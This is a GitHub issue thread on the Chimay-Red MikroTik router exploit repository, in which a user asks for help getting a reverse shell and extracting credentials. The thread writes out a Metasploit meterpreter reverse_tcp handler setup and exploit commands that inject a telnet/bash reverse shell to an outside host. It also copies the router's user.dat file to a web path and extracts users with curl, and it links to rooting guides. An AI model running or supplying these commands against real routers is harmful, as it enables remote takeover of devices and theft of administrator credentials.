search

BigNerd95 / Chimay-Red

Working POC of Mikrotik exploit from Vault 7 CIA Leaks
649 stars 216 forks source link

shellcommand #28

Open halekan opened 6 years ago

halekan commented 6 years ago

what shellcommand how build it by KALI LINUX to make it works fine /StackClash_mips.py 192.168.1.233 80 binary 192.168.1.89 6785 "nova/bin/info '/system reboot'" Usage: ./StackClash_mips.py IP PORT binary shellcommand

How to get a reverse shell?

  1. First, prepare metasploit multi handler on your computer

    use exploit/multi/handler set payload linux/mipsbe/meterpreter/reverse_tcp set LHOST YOUR IP set LPORT YOUR LPORT run

where payload to send it to mikrotik and how build it msfvenom we have only binary ???????

can explain

BigNerd95 commented 6 years ago

What is this? /StackClash_mips.py 192.168.1.233 80 binary 192.168.1.89 6785 "nova/bin/info '/system reboot'"

Pseudo random command?

Please read the readme.md before opening issues https://github.com/BigNerd95/Chimay-Red/blob/master/README.md#reverse-shell

halekan commented 6 years ago

good

Read it full tes on RB750GL / MIPSBE / v6.37.1

$ nc -l -p 1234

root@test:~/Chimay# ./StackClash_mips.py 192.168.230.113 80 www_binary "/bin/mknod /ram/f p; /bin/telnet 192.168.233.190 1234 < /ram/f | /bin/bash > /ram/f 2>&1"

Crash... Connected Sent Sent Opening 2 sockets Connected Connected Stack clash... Sent Sent Sent Sending payload Sent Starting exploit Done!

root@test:~/Chimay# ./StackClash_mips.py 192.168.233.190 80 www_binary "cp /rw/store/user.dat /ram/winbox.idx"

Crash... Connected Sent Sent Opening 2 sockets Connected Connected Stack clash... Sent Sent Sent Sending payload Sent Starting exploit Done!

Extract users not thing happen

root@test:~/Chimay# curl -s http://192.168.233.190/winbox/index | ./tools/extract_user.py -

root@test:~/Chimay# ............................. it is blank no result no user no password .......................................

BigNerd95 commented 6 years ago

Does reverse shell work? When you run "extract user" do you close reverse shell before running the exploit?

halekan commented 6 years ago

$ nc -l -p 1234 no

BigNerd95 commented 6 years ago

So you have to root your board and debug it Sorry but I cant test all versions for anyone If you are able to fix it then send a PR

halekan commented 6 years ago

how root it Give Me Steps one by one

BigNerd95 commented 6 years ago

Also a coffee?

Some links

https://github.com/0ki/mikrotik-tools/tree/master/exploit-backup

https://www.dropbox.com/s/3fey2nmmu993xz1/Rooting%20Mikro%20Tik%20routers.pdf?dl=0

Then read my pdf to install gdb-server

BigNerd95 commented 6 years ago

Nope